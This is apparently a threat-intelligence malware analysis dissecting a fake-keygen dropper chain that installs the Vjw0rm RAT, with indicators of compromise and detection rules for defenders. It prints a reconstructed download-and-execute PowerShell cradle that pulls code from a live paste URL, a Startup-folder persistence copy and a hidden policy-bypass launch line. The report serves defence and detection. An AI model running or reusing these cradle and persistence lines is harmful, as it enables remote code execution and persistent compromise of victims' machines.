highPhishing

The Fake Keygen That Wasn't: Unpacking a Four-Layer Vjw0rm RAT Dropper Chain

PublishedMarch 12, 2026

Threat Actors:ProfileAssessment

phishingc2zero-dayaptspearphishing

TL;DR: A WinRAR self-extracting archive posing as a software keygen hides a four-layer dropper chain that ultimately deploys Vjw0rm, a commodity JavaScript RAT first seen around 2016 and still very much alive. The chain nests SFX inside SFX, hands off orchestration to a compiled AutoHotkey binary, drops three parallel execution paths -- a PowerShell download cradle, a JScript/VBScript dropper, and a persistence installer -- then renames a 50KB XML file to .js and runs the actual RAT core. Payload staging runs through upaste[.]me, a legitimate paste service, making domain-level blocking impractical. Turkish-language artifacts in the SFX comment, a reused campaign GUID, and ~200 legitimate Windows diagnostic files used as directory padding point to a Turkish-speaking operator running a keygen/crack lure campaign. VirusTotal scores it 49/71, but the layered execution model means each stage can be swapped independently, and the next variant is probably already compiled.

Someone Downloaded a Keygen

Somewhere, someone wanted free software. They searched, they found a download link, they clicked. The file was an .exe -- a keygen, supposedly. Maybe it came from a torrent, maybe a warez forum, maybe a YouTube video with a Mega link in the description. The delivery vector does not matter. What matters is what happened next.

The outer executable is a WinRAR self-extracting archive, 1.9MB, compiled February 1, 2026. It was first submitted to VirusTotal on March 7 and immediately flagged by 49 of 71 engines. But detection rates at the point of download -- on a shady crack site, served over HTTPS, probably renamed to match whatever software the victim was looking for -- are a different story entirely.

When the victim runs it, two things happen simultaneously. A decoy KeyGen.exe pops up on screen -- a real-looking keygen dialog, UPX-packed, originally compiled in 2017 and recycled for this campaign. While the victim is staring at the keygen window and trying buttons, a second binary, Patch.exe, executes silently in the background. The SFX parameters ensure no extraction dialog appears:

Setup=KeyGen.exe
Silent=1
Overwrite=1

The victim sees a keygen. The malware sees a foothold.

What Was Found vs. What Was Known

Aspect	Prior Public Reporting	This Investigation
Vjw0rm delivery	Typically single-stage email phishing or direct download	Four-layer nested dropper: SFX → SFX → AutoHotkey → JS/PS1/VBS
Decoy technique	Basic document lures (PDF, DOC)	Functional keygen binary (UPX-packed, compiled 2017) recycled as visual distraction
Staging infrastructure	Pastebin.com, hastebin, GitHub gists	upaste[.]me paste service (behind Cloudflare, registered since 2012)
Persistence	Startup folder OR scheduled tasks	Both simultaneously, plus deep directory tree creation in ProgramData
Obfuscation	Basic JS obfuscation, string splitting	Multi-technology: UTF-16LE encoding, Base64, XOR, ROT substitution, Unicode fullwidth characters, `MSScriptControl` dynamic execution
Orchestration	Direct script execution	AutoHotkey compiled binary as orchestrator with UAC bypass, sleep delays, and parallel payload launch
Camouflage	Minimal	~200 legitimate Windows troubleshooting pack files (dated June 2021) used as directory padding
Operator language	Various; Vjw0rm originally authored by "v-j"	Turkish-language SFX comment (`Asagidaki aciklama SFX kod komutlarini icerir`)
Campaign tracking	Limited	GUID `34892937-8948-47dc-9c73-e8f5c918f49a` embedded in Patch.js

Four Layers Deep

The dropper chain is not subtle about its depth. It is, however, effective at compartmentalizing detection: each layer uses a different technology, a different file format, and a different execution context. A signature that catches Layer 1 says nothing about Layers 2 through 4.

[Victim downloads "keygen" from torrent/warez site]
       |
       v
+-------------------------------------+
| Layer 1: Outer WinRAR SFX           |
|  SHA256: 64a92d23...3eee            |
|  1,908,876 bytes                    |
|  Silent=1, Turkish SFX comment      |
|  Drops: KeyGen.exe + Patch.exe      |
+-------------------------------------+
       |
       +--- KeyGen.exe [DECOY] --> Shown to victim
       |    UPX-packed, compiled 2017 (recycled)
       |
       v
+-------------------------------------+
| Layer 2: Patch.exe (Nested SFX)     |
|  SHA256: 4a341185...9a96            |
|  Same imphash as outer SFX          |
|  Drops: setup.exe +                 |
|    WindowsUpdater/ (~200 legit      |
|    Windows diagnostic files)        |
+-------------------------------------+
       |
       v
+-------------------------------------+
| Layer 3: setup.exe (AutoHotkey)     |
|  SHA256: 0419d91f...9dcc            |
|  UAC elevation via RunAs            |
|  Sleeps 3000ms (anti-sandbox)       |
|  Creates deep directory trees       |
|  Launches 4 payloads in parallel:   |
+-------------------------------------+
       |
       +---> win.ps1  (PowerShell download cradle)
       |       Downloads from hxxps://upaste[.]me/r/8dc960578b490d703
       |
       +---> Script.js  (JScript/VBScript dropper)
       |       Downloads from same URL
       |       Copies itself to Startup folder [PERSISTENCE 1]
       |
       +---> Patch.js  (Persistence installer)
       |       Creates scheduled tasks [PERSISTENCE 2]
       |       GUID: 34892937-8948-47dc-9c73-e8f5c918f49a
       |
       +---> PCWDiagnostic.xml --> renamed to WindowsUpdater.js
               THE VJWORM RAT CORE [PERSISTENCE 3]
               WScript.Shell, ActiveXObject, MSScriptControl
               Self-propagation, command execution, registry ops

Each layer is designed to survive the death of the one above it. Even if the outer SFX is flagged and quarantined after execution, the nested payloads are already on disk in C:\Users\Public\Settings and C:\ProgramData\Adobe\AIR\Logs\gp\PerfLogs\Google\start\. The directory paths themselves are designed to blend in -- Adobe, Google, PerfLogs -- names that exist on millions of Windows machines.

The design philosophy is redundancy through parallelism. Three separate payloads launch simultaneously, each targeting the same upaste[.]me URL. If the PowerShell download cradle fails (execution policy, AMSI), the Script.js VBScript dropper tries the same download. If both network-dependent payloads fail, the locally extracted PCWDiagnostic.xml (renamed to WindowsUpdater.js) contains the full Vjw0rm RAT and executes without any network dependency.

The Outer Shell: Turkish Fingerprints and Recycled Tools

The outer SFX and the nested Patch.exe share the same import hash: 2057790ae7855765d51bdc4142e62f9c. Same WinRAR SFX stub, same builder, same operator. The Turkish-language SFX comment is a configuration artifact -- WinRAR's SFX module stores a localized template string that varies by installation language:

Asagidaki aciklama SFX kod komutlarini icerir

Translation: "The description below contains SFX code commands." This is not something the operator typed. It is generated automatically by a Turkish-locale WinRAR installation. It is an OPSEC failure -- a small one, but the kind that clusters campaigns together when you are tracking hundreds of SFX droppers across MalwareBazaar submissions.

Artifact	Imphash	Compile Time	Notes
Outer SFX	`2057790ae7855765d51bdc4142e62f9c`	2026-02-01	WinRAR SFX stub
Patch.exe	`2057790ae7855765d51bdc4142e62f9c`	2026-02-01	Same imphash -- same builder
KeyGen.exe	--	2017-02-07	Recycled decoy, UPX-packed
setup.exe	`471485476459c716374c5ae96580f71f`	2024-03-16	AutoHotkey compiled

The decoy KeyGen.exe tells its own story. Compiled in February 2017 -- nearly nine years before the dropper was built. This is a recycled binary. The operator grabbed an old, legitimate-looking keygen from somewhere and bundled it as the visible distraction. The AutoHotkey orchestrator was compiled in March 2024, placing it somewhere between the decoy and the SFX wrapper in terms of creation timeline. This operator collects and reuses tools.

The 200-File Camouflage Layer

The nested SFX drops not just setup.exe but an entire WindowsUpdater/ directory containing approximately 200 legitimate Windows troubleshooting pack files:

Printer diagnostics
Audio diagnostics
Bluetooth troubleshooters
Networking troubleshooters
Various system diagnostic XML and configuration files

All dated June 2021, copied from a real Windows 10 installation. The purpose is entirely cosmetic -- if a user or analyst browses to the extraction directory, they see what looks like a legitimate Windows system directory, not a malware staging area. The actual malicious payload (PCWDiagnostic.xml) hides among these legitimate files with a name that fits right in. A file called PCWDiagnostic.xml sitting next to PrinterDiagnostic.xml and AudioDiagnostic.xml does not stand out. That is the point.

The AutoHotkey Orchestrator

Layer 3 is where the operation gets interesting. setup.exe is a compiled AutoHotkey v1.x script (PE32, compiled March 2024) that serves as the central orchestrator. Its behavior is sequential and deliberate:

Check admin privileges. If not admin, request UAC elevation via RunAs. This is the only user-visible prompt in the entire chain beyond the decoy keygen.
Sleep 3000 milliseconds. Anti-sandbox. Many sandboxes have execution timeouts shorter than the cumulative sleep time across all layers.
Create a deep directory tree: C:\ProgramData\Adobe\AIR\Logs\gp\PerfLogs\Google\start
Copy payloads to C:\Users\Public\Settings\A\News\
Launch win.ps1 via PowerShell with -WindowStyle Hidden -ExecutionPolicy Bypass
Launch Script.js via Windows Script Host
Launch Patch.js via Windows Script Host
Rename PCWDiagnostic.xml to WindowsUpdater.js and execute it (the Vjw0rm RAT)

The directory path in step 3 deserves a closer look. C:\ProgramData\Adobe\AIR\Logs is a path that exists on any machine with Adobe AIR installed. PerfLogs is a default Windows directory. Google is ubiquitous. The operator is building a path that, at every level, looks like it belongs there. A SOC analyst scanning a directory listing would need to look closely to notice that C:\ProgramData\Adobe\AIR\Logs\gp\PerfLogs\Google\start\WindowsUpdater.js is not, in fact, a legitimate file.

The Download Cradle: Three Roads to the Same Paste

All network-dependent payloads converge on a single URL: hxxps://upaste[.]me/r/8dc960578b490d703.

Path 1: win.ps1 (PowerShell)

The PowerShell script is obfuscated with multiple layers:

Base64 encoding (UTF-16LE)
XOR operations with varying keys
ROT-based character substitution
Invoke-Command -ScriptBlock with [scriptblock]::Create()
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(...)) for final decoding

When fully unwound, it resolves to a Net.WebClient.DownloadString() call to the upaste URL.

Path 2: Script.js (JScript/VBScript hybrid)

Script.js is UTF-16LE encoded JScript that creates a WScript.Shell object and constructs a PowerShell command character by character to evade static string detection:

// Reconstructed from obfuscated source
var shell = new ActiveXObject("WScript.Shell");
shell.Run("PowerShell -noexit -command Invoke-Expression(" +
  "(New-Object Net.WebClient).DownloadString(" +
  "'https://upaste.me/r/8dc960578b490d703'))");

After launching the download, Script.js copies itself to the Windows Startup folder using xcopy:

startPath = obj.SpecialFolders("Startup")
xcopy.exe ScriptFullName -> %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Script.js

This is the first persistence mechanism -- crude, effective, and guaranteed to survive a reboot.

Path 3: PCWDiagnostic.xml (the RAT itself)

The AutoHotkey orchestrator renames PCWDiagnostic.xml to WindowsUpdater.js and executes it directly. This is the Vjw0rm RAT core -- no download required. It was already on disk, hiding inside the nested SFX, disguised as a Windows diagnostic configuration file. Even if upaste[.]me goes down, the RAT is already installed.

The Vjw0rm RAT Core: A Decade Old and Still Working

The final payload is a ~50KB obfuscated JScript file that matches known Vjw0rm RAT signatures. First authored by an individual known as "v-j" around 2016, Vjw0rm has been widely forked and reused by commodity threat actors for a decade. Despite its age, it remains effective because it runs entirely within Windows Script Host -- no compiled binary, no DLL injection, no process hollowing. Just JavaScript calling COM objects on a platform that still allows it.

The obfuscation uses array-based variable shuffling with hex-prefixed names (_0x5b8a, _0x1bbc) and parseInt for numeric deobfuscation. Underneath, the capabilities are textbook Vjw0rm:

Capability	Implementation	Purpose
Command execution	`WScript.Shell` + `.Run()`	Execute arbitrary system commands
COM automation	`ActiveXObject`	Interact with Windows subsystems
Dynamic scripting	`MSScriptControl.ScriptControl` + `.AddCode()`	Execute VBScript/JScript payloads at runtime
Self-reference	`ScriptFullName`	Locate and copy itself for persistence/propagation
Persistence	`SpecialFolders("Startup")`	Survive reboots via Startup folder
File operations	`CreateTextFile`, `OpenTextFile`, `CopyFile`, `FileExists`	Read, write, copy, enumerate files
Registry operations	`RegRead`, `RegWrite`	Modify system/user configuration
WMI queries	`winmgmts:\\localhost\root\SecurityCenter`	Enumerate installed security products
Environment recon	Environment variable access	Fingerprint the host OS, user, paths
Self-propagation	USB/network spread via file copy	Lateral movement to removable media
Error suppression	`resume` / `next`	Silently swallow errors to avoid detection
Anti-analysis	`Timeout` / `Sleep`	Delay execution to evade sandboxes

The WMI query to SecurityCenter is notable. The RAT checks which antivirus products are installed before deciding how to behave. This is commodity malware with just enough situational awareness to be dangerous.

Persistence: Belt, Suspenders, and a Scheduled Task

The dropper chain installs persistence through three independent mechanisms. Removing one leaves two others intact. Removing two leaves one. This is defense-in-depth, but for attackers.

#	Mechanism	Location	Payload	Survival
1	Startup Folder	`%APPDATA%\...\Startup\Script.js`	VBScript dropper (re-downloads RAT on every boot)	Survives reboot
2	Scheduled Task	Created via Patch.js	Periodic execution of malicious scripts	Survives reboot + manual cleanup of Startup
3	Deep Directory Install	`C:\ProgramData\Adobe\AIR\Logs\gp\PerfLogs\Google\start\WindowsUpdater.js`	Full Vjw0rm RAT core	Survives until manually found

The GUID 34892937-8948-47dc-9c73-e8f5c918f49a embedded in Patch.js is likely a campaign or variant identifier. It appears nowhere else in public reporting as of this writing, but tracking it across future MalwareBazaar and VirusTotal submissions may reveal other campaigns from the same operator. The Patch.js persistence installer also uses Unicode fullwidth character obfuscation -- encoding standard ASCII characters as their fullwidth Unicode equivalents (U+FF00 range) to evade string-matching detection rules that only look for ASCII patterns.

The Staging Infrastructure: Why You Cannot Just Block the Domain

The payload staging URL -- hxxps://upaste[.]me/r/8dc960578b490d703 -- points to a legitimate paste service, not attacker-controlled infrastructure.

Property	Value
Domain	`upaste[.]me`
Registrar	Namecheap, Inc.
Created	2012-03-12
Cloudflare IPs	`104[.]21[.]45[.]216`, `172[.]67[.]219[.]92`
Nameservers	`cameron[.]ns[.]cloudflare[.]com`, `eve[.]ns[.]cloudflare[.]com`
SPF includes	`141[.]94[.]22[.]2/25` (OVH IP range)
Recent certs	Let's Encrypt R12 (Feb 2026), Google Trust WE1 (Jan 2026)

Blocking upaste[.]me at the domain level would break any legitimate use of the service. The actionable IOC is the full URL path: /r/8dc960578b490d703. Block that specific path at the web proxy, report it to upaste.me for takedown, and monitor for new paste URLs following the same /r/ pattern with similar payload characteristics.

This is the dead drop resolver technique (MITRE T1102.001). The attacker uploads a payload to a public service. The malware retrieves it at runtime. The hosting infrastructure is someone else's problem. If the paste is taken down, the attacker uploads a new one and recompiles the dropper with the updated URL. The turnaround time is minutes.

The Operator: What the Artifacts Tell Us

Attribution confidence is low-to-medium. This is commodity cybercrime, not an APT operation. But the artifacts cluster in useful ways:

Turkish locale: The WinRAR SFX comment is automatically generated in Turkish. The operator installed WinRAR in Turkish, or their Windows locale is Turkish.
Toolchain reuse: Both SFX archives share the same imphash (2057790ae7855765d51bdc4142e62f9c), confirming the same SFX builder was used for both layers.
Recycled components: The decoy KeyGen.exe was compiled in 2017. The AutoHotkey orchestrator was compiled in March 2024. The Windows troubleshooting files are from June 2021. This operator collects and reuses tools from different eras.
Campaign GUID: 34892937-8948-47dc-9c73-e8f5c918f49a in Patch.js is either a variant identifier or a tracking tag. It may link this sample to other campaigns by the same operator.
Sophistication: Low-to-medium. Commodity tools (WinRAR SFX, AutoHotkey, Vjw0rm) with moderate obfuscation. No custom C2 infrastructure. No zero-days. The skill is in the layering, not in any individual component.
Motivation: Financial. Crack/keygen lures target users who are already willing to run untrusted executables. The Vjw0rm RAT provides remote access for data theft, credential harvesting, or further payload deployment.

The likely distribution channels are torrent sites, warez/crack forums, YouTube tutorials with download links in the description, and SEO-poisoned search results for "[software name] keygen" or "patch."

Detection

Endpoint Detection

Process tree to monitor:

explorer.exe
  └─ [outer_sfx].exe          (WinRAR SFX)
       ├─ KeyGen.exe           (decoy - visible to user)
       └─ Patch.exe            (nested SFX - silent)
            └─ setup.exe       (AutoHotkey - UAC prompt)
                 ├─ powershell.exe -WindowStyle Hidden -exec bypass -file win.ps1
                 ├─ wscript.exe Script.js
                 ├─ wscript.exe Patch.js
                 └─ wscript.exe WindowsUpdater.js

Key behavioral indicators:

wscript.exe or cscript.exe spawned by an AutoHotkey-compiled binary
PowerShell with -noexit -exec bypass and -WindowStyle Hidden launched from a non-standard parent process
File creation in C:\ProgramData\Adobe\AIR\Logs\gp\PerfLogs\Google\start\
File creation in C:\Users\Public\Settings\A\News\
Script.js appearing in any user's Startup folder
Scheduled task creation by wscript.exe
WMI queries to root\SecurityCenter from wscript.exe or cscript.exe

Sigma-style detection logic:

title: Vjw0rm Dropper - AutoHotkey Spawning Script Hosts
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\setup.exe'
    Image|endswith:
      - '\wscript.exe'
      - '\cscript.exe'
      - '\powershell.exe'
  condition: selection
level: high

title: Vjw0rm Persistence - Suspicious Script in Startup Folder
status: experimental
logsource:
  category: file_creation
  product: windows
detection:
  selection:
    TargetFilename|contains: '\Start Menu\Programs\Startup\'
    TargetFilename|endswith:
      - '\Script.js'
      - '\WindowsUpdater.js'
  condition: selection
level: critical

title: Vjw0rm Staging Directory Creation
status: experimental
logsource:
  category: file_creation
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Adobe\AIR\Logs\gp\PerfLogs\Google\start\'
      - '\Users\Public\Settings\A\News\'
  condition: selection
level: high

Network Detection

Block the specific paste URL: hxxps://upaste[.]me/r/8dc960578b490d703 at the web proxy
Alert on PowerShell Net.WebClient.DownloadString calls to any paste service (upaste.me, pastebin.com, hastebin.com, etc.)
Monitor for Windows Script Host HTTP requests (Microsoft-CryptoAPI user-agent originating from wscript.exe)
Deploy Suricata rules targeting the specific upaste.me payload path and PowerShell download patterns (SID range 9000001-9000006 provided in the investigation)

YARA Deployment

Seven YARA rules cover the complete dropper chain:

Rule	Target	Key Signatures
`Vjw0rm_SFX_Dropper_Turkish`	Outer SFX	Turkish SFX comment strings + `Silent=1` + `Patch.exe`/`KeyGen.exe`
`Vjw0rm_AutoHotkey_Orchestrator`	setup.exe	AHK marker + ProgramData/Adobe paths + payload filenames + RunAs
`Vjw0rm_ScriptJS_VBS_Dropper`	Script.js	Character-by-character PowerShell construction + upaste + Startup copy
`Vjw0rm_PCWDiagnostic_Payload`	RAT core	Hex-prefixed obfuscation vars (`_0x5b8a`) + WScript/ActiveXObject/MSScriptControl
`Vjw0rm_PatchJS_Persistence`	Patch.js	GUID `34892937...` + Unicode fullwidth bytes + charCodeAt/fromCharCode
`Vjw0rm_WinPS1_DownloadCradle`	win.ps1	Invoke-Command + scriptblock + FromBase64String + bxor
`Vjw0rm_Generic_JSWorm`	Any Vjw0rm variant	Generic strings: WScript.Shell, MSScriptControl, Startup, AddCode, SpecialFolders

MITRE ATT&CK Mapping

Tactic	Technique	ID	Implementation
Initial Access	Phishing: Spearphishing Link	T1566.002	Crack/keygen download lure via torrent/warez/SEO
Execution	User Execution: Malicious File	T1204.002	Victim runs fake keygen SFX
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	win.ps1 multi-layer obfuscated download cradle
Execution	Command and Scripting Interpreter: JavaScript	T1059.007	Script.js, Patch.js, WindowsUpdater.js (Vjw0rm)
Execution	Command and Scripting Interpreter: Visual Basic	T1059.005	VBScript payload constructed in Script.js
Persistence	Boot or Logon Autostart: Startup Folder	T1547.001	Script.js copies to Startup via xcopy
Persistence	Scheduled Task/Job	T1053.005	Patch.js creates scheduled tasks
Privilege Escalation	Abuse Elevation Control: Bypass UAC	T1548.002	setup.exe RunAs elevation
Defense Evasion	Obfuscated Files or Information	T1027	Multi-layer encoding: Base64, XOR, ROT, Unicode fullwidth
Defense Evasion	Deobfuscate/Decode Files	T1140	Base64/XOR/ROT decoding chain in win.ps1
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	PCWDiagnostic.xml, WindowsUpdater directory, Adobe/Google paths
Defense Evasion	Masquerading: Rename System Utilities	T1036.003	Legitimate directory names (Adobe, PerfLogs, Google)
Defense Evasion	Indicator Removal: File Deletion	T1070.004	Potential cleanup after execution
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	HTTPS download from upaste[.]me
Command and Control	Ingress Tool Transfer	T1105	PowerShell DownloadString from paste URL
Command and Control	Web Service: Dead Drop Resolver	T1102.001	upaste[.]me as payload dead drop

Indicators of Compromise

File Hashes

SHA256	Filename	Type	Size
`64a92d23f6efcc17cdd3016a52e0503a13350f037785220a08b74b46333a3eee`	Outer SFX dropper	PE32+ SFX	1,908,876 B
`4a341185e5e0983feca8a39b65b92a6d69b72d2093aa1a1b134b39d63a1c9a96`	Patch.exe (nested SFX)	PE32+ SFX	1,433,148 B
`0419d91f867968fce085b3a1bbe3c3dc96e1b83e8e8c27d4a5d4e64be1389dcc`	setup.exe (AutoHotkey)	PE32	1,592,832 B
`2194ca289a5a9079336833af2baddac2cff10e2e13fcdf90f60c609022edac8b`	KeyGen.exe (decoy)	PE32 UPX	338,432 B
`33629caa9918c81a5e1ce58c1682e7465ac6f4bccd8d9c13d429249920c6d557`	PCWDiagnostic.xml (Vjw0rm RAT)	JScript	50,048 B
`7cde01a4501650197d535ea8bd4d8269ff3d1d32f98603808fafd18f5f1a83db`	Script.js	JS/VBS dropper	--
`d9921f8af671521c36a1158f9ae98a52b45cba288d2bf84abf33575b2bdd78e7`	Patch.js	JS persistence	--
`aa473b497f678fa03231fd55cd7c93467a26223f58f05581f59d4a81abd50152`	win.ps1	PS download cradle	--

Additional File Hashes

Artifact	MD5	SHA1
Outer SFX	`8f23f5ab2326351ff30a4d42736dd7db`	`cc4d5c8ed5f1c2a9908235c50dd2c25387ce6ece`
KeyGen.exe	`02e471d897adb098329a2c9d97288d92`	--
Patch.exe	`68a892e14034ac026e29de0fe9038db9`	--
setup.exe	`7e28077d152d309761d5519b89989c06`	--

Network Indicators (Defanged)

Type	Indicator	Context
URL	`hxxps://upaste[.]me/r/8dc960578b490d703`	Payload staging URL (dead drop)
Domain	`upaste[.]me`	Paste service (legitimate, abused -- do NOT block domain-wide)
IP	`104[.]21[.]45[.]216`	Cloudflare CDN for upaste[.]me (shared IP -- do NOT block)
IP	`172[.]67[.]219[.]92`	Cloudflare CDN for upaste[.]me (shared IP -- do NOT block)

Behavioral Indicators

Type	Value	Context
Imphash	`2057790ae7855765d51bdc4142e62f9c`	WinRAR SFX stub (both dropper layers)
Imphash	`471485476459c716374c5ae96580f71f`	AutoHotkey compiled binary
SSDEEP	`49152:FgTbH94Yx3btqsZgTenU8U8+udvwLsykJ:i2QtqAADIv7`	Outer SFX fuzzy hash
GUID	`34892937-8948-47dc-9c73-e8f5c918f49a`	Campaign/variant identifier in Patch.js
Path	`C:\ProgramData\Adobe\AIR\Logs\gp\PerfLogs\Google\start\`	RAT staging directory
Path	`C:\Users\Public\Settings\A\News\`	Download cradle location
File	`WindowsUpdater.js` (in ProgramData path)	Renamed Vjw0rm RAT core
File	`Script.js` (in Startup folder)	Persistence VBScript dropper
File	`win.ps1` (in Public\Settings)	Obfuscated PowerShell download cradle

Published by Breakglass Intelligence. Investigation conducted 2026-03-11. A fake keygen. Four execution layers. Three persistence mechanisms. Two hundred decoy files. One paste site dead drop. And a Turkish-language comment the operator forgot to remove. Classification: TLP:CLEAR